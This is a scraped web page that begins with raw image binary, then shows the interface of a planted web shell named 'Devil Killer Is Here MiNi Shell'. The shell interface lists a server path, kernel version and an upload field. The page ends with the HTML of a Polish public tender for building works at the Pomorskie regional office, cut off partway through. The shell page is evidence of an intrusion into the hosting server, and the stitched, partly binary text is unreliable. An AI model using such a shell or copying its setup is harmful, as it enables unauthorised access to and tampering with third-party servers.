JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250428/0020909201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty budowlane w UMWP:<br/>1) Remont połaci dachowej od strony wschodniej budynku przy ul. Okopowej 21/27 w Gdańsku”, <br/>2) Modernizacja pomieszczeń parteru w budynku przy ul. Augustyńskiego 2 w Gdańsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Województwo Pomorskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191674836</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Okopowa 21/27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-810</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pomorskie.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.pomorskie.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty budowlane w UMWP:<br/>1) Remont połaci dachowej od strony wschodniej budynku przy ul. Okopowej 21/27 w Gdańsku”, <br/>2) Modernizacja pomieszczeń parteru w budynku przy ul. Augustyńskiego 2 w Gdańsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7fe7e815-e851-4f27-8d14-c64aef4b29d9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00209092</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00026867/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Roboty budowlane w siedzibach Urzędu Marszałkowskiego Województwa Pomorskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pomorskie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pomorskie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim, w formie elektronicznej, za pośrednictwem Platformy zakupowej.<br/>2. Komunikacja między Zamawiającym, a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane winny być za pośrednictwem Platformy zakupowej za pomocą formularza „Wyślij wiadomość do zamawiającego”.<br/>3. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy zakupowej poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>4. Zamawiający dopuszcza, awaryjnie, komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: zamowienia@pomorskie.eu<br/>5. Zamawiający będzie przekazywał Wykonawcom informacje elektronicznie za pośrednictwem Platformy zakupowej. Informacje, zawiadomienia, zmiany, odpowiedzi - Zamawiający będzie zamieszczał na Platformie zakupowej. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana elektronicznie za pośrednictwem Platformy zakupowej do konkretnego Wykonawcy, na adres mailowy wskazany w ofercie Wykonawcy.<br/>6. Wykonawca, jako podmiot profesjonalny, ma obowiązek sprawdzania komunikatów i wiadomości przesłanych przez Zamawiającego, bezpośrednio na Platformie zakupowej oraz na poczcie elektronicznie – pod adresem wskazanym w ofercie, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>7. Zamawiający wskazuje niezbędne wymagania techniczne umożliwiające pracę na Platformie zakupowej, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 256 kb/s;<br/>2) przeglądarka internetowa EDGE, Chrome lub FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki typu „cookies”.<br/>Ponadto Zamawiający informuję, że występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty lub wniosku do ilości 10 plików lub spakowanych folderów (pliki można spakować programem do archiwizacji np. 7-Zip) przy maksymalnej wielkości 150 MB.<br/>8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z Platformy zakupowej określone w Regulaminie zamieszczonym na stronie internetowej Platformy<br/>pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do aktualnej Instrukcji składania ofert/wniosków dostępnej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/>9. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy zakupowej w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy<br/>Pzp.<br/>10. Zamawiający informuje, że instrukcje korzystania z Platformy zakupowej, dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy zakupowej znajdują się pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>11. W zakresie kwestii nieuregulowanych niniejszą SWZ obowiązują przepisy ustawy Pzp oraz Rozporządzenia Prezesa Rady Ministrów z dnia z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Zarząd Województwa Pomorskiego z siedzibą przy ul. Okopowej 21/27, 80-810 Gdańsk, tel. 58 326 87 58 adres e-mail: zamowienia@pomorskie.eu<br/>2. W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych (IOD): e-mail:<br/>iod@pomorskie.eu<br/>3. Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania i udzieleniu zamówienia, prowadzenia dokumentacji księgowo-podatkowej, archiwizacji danych, dochodzenia roszczeń lub obrony przed roszczeniami.<br/>4. Podstawą przetwarzania danych osobowych jest:<br/>1) ustawa z 11 września 2019 r. - Prawo zamówień publicznych;<br/>2) ustawa z 27 sierpnia 2009 r. o finansach publicznych;<br/>3) ustawa z 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach;<br/>4) art. 6 pkt.1 lit. c RODO<br/>– przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.<br/>5. Odbiorca lub kategorie odbiorców: podmioty upoważnione na podstawie zawartych umów powierzenia oraz uprawnione na mocy obowiązujących przepisów prawa, w szczególności osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania na podstawie art. 18 oraz art. 74–76 ustawy Pzp. Zasada jawności ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO (szczególna kategoria danych).<br/>6. Pani/Pana dane osobowe będą przechowywane do czasu zakończenia obowiązującego nas okresu archiwizacji.<br/>7. Posiada Pani/Pan prawo:<br/>1) żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może, zgodnie z art. 75 ustawy Pzp, żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>2) żądania sprostowania lub uzupełnienia danych osobowych; zgodnie z art. 76 ustawy Pzp wykonanie tego obowiązku nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>3) usunięcia danych w przypadku, gdy dane osobowe nie są już niezbędne do celów, w których zostały zebrane, lub w inny sposób przetwarzane;<br/>4) żądania ograniczenia przetwarzania danych osobowych; zgodnie z art. 74 ust. 3 PZP wykonanie tego obowiązku nie ogranicza przetwarzania danych osobowych do czasu zakończenie postępowania o udzielenie zamówienia.<br/>8. Przysługuje Pani/Pan prawo do wniesienia skargi do organu nadzorczego, tj. Urzędu Ochrony Danych Osobowych ul. Stawki 2, 00-913 Warszawa.<br/>9. Pani/Pana dane osobowe nie będą poddawane zautomatyzowanemu podejmowaniu decyzji, w tym również profilowaniu.<br/>10. Pani/Pana dane osobowe nie będą przekazywane do państw trzecich.<br/>11. Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanych z udziałem w postępowaniu o udzielenie zamówienia; konsekwencje niepodania określonych danych wynikają z PZP.<br/>12. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAZ-Z.272.35.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: Roboty budowlane w siedzibach Urzędu Marszałkowskiego Województwa Pomorskiego, w podziale na następujące części zamówienia: <br/>1)	Remont połaci dachowej od strony wschodniej budynku przy ul. Okopowej 21/27 w Gdańsku” – który obejmować będzie prace rozbiórkowe, budowlane oraz montażowe związane z remontem części połaci dachowej o łącznej powierzchni około 75 m², znajdującej się od strony wschodniej w celu przeciwdziałania zalewaniu poniższych kondygnacji budynku.<br/><br/>2.	Charakterystyczne parametry określające usytuowanie i wielkość obiektów:<br/> Budynki znajdują się w strefie ochrony konserwatorskiej miasta Gdańsk.<br/>Część nr 1: Budynek przy Okopowej 21/27 jest częścią kompleksu zespołu połączonych komunikacyjnie budynków Urzędów: Marszałkowskiego oraz Wojewódzkiego w zabudowie szeregowej. Kształt obiektu w rzucie przedstawia literę U. Od strony wschodniej znajdują się dwie przybudówki (skrzydła boczne). Wejście główne do budynku znajduje się od strony zachodniej tj. od ul. Okopowej. Budynek posiada pięć kondygnacji nadziemnych (parter, I piętro, II piętro, III piętro, poddasze zaadaptowane na pokoje biurowe), obiekt jest podpiwniczony. Dach budynku dwuspadowy w konstrukcji drewnianej płatwiowo-kleszczowy pokryty dachówką ceramiczną. Układ konstrukcyjny ścian nośnych podłużny. Ściany konstrukcyjne wykonane z cegły pełnej ceramicznej gr. 25 – 51 cm. Stropy między kondygnacyjne stalowo ceramiczne, żelbetowe oraz drewniane.<br/><br/>Budynki wyposażone są w instalacje: wodno-kanalizacyjne, elektryczne, telefoniczne, klimatyzacji, telewizji kablowej, teletechniczne, a także c.o. z węzła zlokalizowanego w pomieszczeniu piwnicznym.<br/>Istniejące instalacje w pomieszczeniach i ciągach komunikacyjnych:<br/>-	Oświetlenie,<br/>-	obwody gniazd użytkowych,<br/>-	sieć komputerowa,<br/>-	instalacja alarmowa,<br/>-	instalacja Systemu Automatycznego Powiadamiania o Pożarze (SAP),<br/>-	instalacja hydrantowa,<br/>-	Instalacja klimatyzacji.<br/><br/>3.	Wykonawca może złożyć ofertę na dowolną ilość części zamówienia.<br/>4.	Zamówienie należy zrealizować zgodnie z wymogami zawartymi w: Opisie Przedmiotu Zamówienia stanowiącym załączniki nr 1.1 - 1.2 do SWZ, oraz we wzorach umów stanowiących załącznik nr 2.1 - 2.2 do SWZ.<br/>5.	Minimalny, wymagany przez Zamawiającego termin gwarancji jakości na roboty budowlane i zamontowane urządzenia wynosi 60 miesięcy. Niezależnie od udzielonej gwarancji jakości na roboty budowlane, która stanowi kryterium oceny ofert, Wykonawca ponosi wobec Zamawiającego odpowiedzialność z tytułu rękojmi za wady, na zasadach określonych <br/>w Kodeksie cywilnym, tj. Wykonawca odpowiada z tytułu rękojmi, jeżeli wada fizyczna zostanie stwierdzona przed upływem dwóch lat, a gdy chodzi o wady nieruchomości – przed upływem pięciu lat od dnia odbioru końcowego.<br/>6.	Wykonawca musi przewidzieć zabezpieczenie terenu robót, prace wykonywać zgodnie z przepisami dotyczącymi ochrony środowiska, ochrony przeciwpożarowej, ochrony własności publicznej i prywatnej, bezpieczeństwa i higieny pracy, stosować się do przepisów praw a, zapewnić właściwe materiały i normy związane z wykonaniem zamówienia, zapewnić kontrolę jakości robót oraz dokumentacji potrzebnej do odbioru robót.<br/>7.	Przedmiar robót należy traktować jako dokument pomocniczy, który nie może stanowić jedynej podstawy do obliczenia wynagrodzenia za realizację przedmiotu zamówienia. Zawarte w przedmiarze robót zestawienia mają jedynie zobrazować skalę przedmiotu zamówienia i pomóc Wykonawcom w oszacowaniu kosztów inwestycji.<br/>8.	Wykonawca jest zobowiązany do analizy rozwiązań przedstawionych w dokumentacji SWZ, pod kątem przyjętych rozwiązań technicznych i optymalizacji systemu robót. Wykonawca zobowiązany jest do uzgodnienia rodzaju i kolorystyki użytych materiałów a następnie uzyskania akceptacji od Zamawiającego.<br/>9.	Wykonawca zobowiązany jest do zgłoszenia Zamawiającemu, z minimum jednodniowym wyprzedzeniem, konieczności wykonywania prac popołudniu lub w dni wolne od pracy Urzędu.<br/>10.	Roboty budowlane będą wykonywane w czynnym obiekcie. Roboty hałaśliwe należy wykonać w uzgodnieniu z Zamawiającym, w godzinach popołudniowych – po godzinach pracy Urzędu. Część robót będąca kłopotliwa dla funkcjonowania pracy Urzędu (roboty rozbiórkowe, pył, gruz) wykonywać po uzgodnieniu z Zamawiającym w czasie wolnym od pracy urzędu (dni wolne, weekendy, godziny popołudniowe). Należy uwzględnić i zapewnić możliwość funkcjonowania sąsiednich pomieszczeń. Prowadzone prace nie mogą mieć negatywnego wpływu na ciągi komunikacyjne, budynki i tereny sąsiednie, w tym należytego utrzymania porządku i czystości.<br/>11.	Wykonawca musi przewidzieć zabezpieczenie placu/terenu budowy oraz jego otoczenia przed zabrudzeniem i zniszczeniem. Prace wykonywać zgodnie z przepisami dotyczącymi ochrony środowiska, ochrony przeciwpożarowej, ochrony własności publicznej i prywatnej, bezpieczeństwa i higieny pracy, stosować się do przepisów prawa, zapewnić właściwe materiały i normy związane z wykonaniem zamówienia, zapewnić kontrolę jakości robót oraz dokumentacji potrzebnej do odbioru robót.<br/>12. Zamawiający nie zastrzega możliwości ubiegania się o zamówienie wyłącznie przez Wykonawców, o których mowa w art. 94 ustawy Pzp.<br/>13. Zamawiający nie dopuszcza możliwości złożenia oferty wariantowej, o której mowa w art. 92 ustawy Pzp, tzn. oferty przewidującej odmienny sposób wykonania zamówienia niż określony w niniejszej SWZ.<br/>18.	Zamawiający nie przewiduje zawarcia umowy ramowej i ustanowienia dynamicznego systemu zakupów oraz nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej. <br/>19.	Zamawiający nie przewiduje udzielania zamówień na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>20.	Zamawiający nie dopuszcza składania oferty w postaci katalogów elektronicznych ani dołączania katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy Pzp.<br/>21.	Zamawiający nie przewiduje rozliczenia w walutach obcych. Rozliczenie zamówienia prowadzone jest w PLN. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</p> <p class="mb-0">45261900-3 - Naprawa i konserwacja dachów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Wszystkie oferty niepodlegające odrzuceniu oceniane będą na podstawie następujących kryteriów:<br/><br/>Dotyczy zarówno części 1 nr i części nr 2 zamówienia:<br/><br/>Kryterium:<br/>1.	Cena brutto wykonania zamówienia (PK1) - waga 90%<br/>2.	Termin gwarancji na roboty budowlane i zamontowane urządzenia (PK2) - waga 10%<br/><br/>Przy czym [1% = 1 pkt].<br/><br/>2.	Sposób przyznawania punktów:<br/>1)	dla kryterium: „Cena” (PK1):<br/>Przez kryterium Cena brutto wykonania zamówienia Zamawiający rozumie całkowity koszt brutto realizacji całości zamówienia. Do oceny Zamawiający przyjmuje cenę brutto wpisaną przez Wykonawcę do formularza ofertowego, którego wzór stanowi załącznik nr 3 do SWZ.<br/>Sposób obliczenia:<br/>PK1 = [CN / CR x 90 %] x 100<br/>PK1	– ilość punktów dla kryterium <br/>CN	– najniższa oferowana cena <br/>CR	– cena oferty rozpatrywanej<br/><br/>2)	dla kryterium: “Termin gwarancji na roboty budowlane i zamontowane urządzenia” (PK2):<br/>W kryterium „Termin gwarancji na roboty budowlane i zamontowane urządzenia” Zamawiający przyzna następującą punktację: <br/>•	Zaoferowanie przez Wykonawcę minimalnego okresu gwarancji na roboty budowlane i zamontowane urządzenia 60 miesięcy - oferta Wykonawcy otrzyma 0 punktów;<br/>•	Zaoferowanie przez Wykonawcę okresu gwarancji na roboty budowlane <br/>i zamontowane urządzenia ponad wymagane minimum (60 miesięcy), tj. na okres 72 miesięcy (dodatkowo 12 miesięcy) - oferta Wykonawcy otrzyma 5 punktów; <br/>•	Zaoferowanie przez Wykonawcę okresu gwarancji na roboty budowlane <br/>i zamontowane urządzenia ponad wymagane minimum (60 miesięcy), tj. na okres 84 miesięcy (dodatkowo 24 miesiące) - oferta Wykonawcy otrzyma 10 punktów.<br/>Przy czym przez: „Termin gwarancji na roboty budowlane i zamontowane urządzenia” należy rozumieć oferowany przez Wykonawcę okres, liczony w miesiącach, 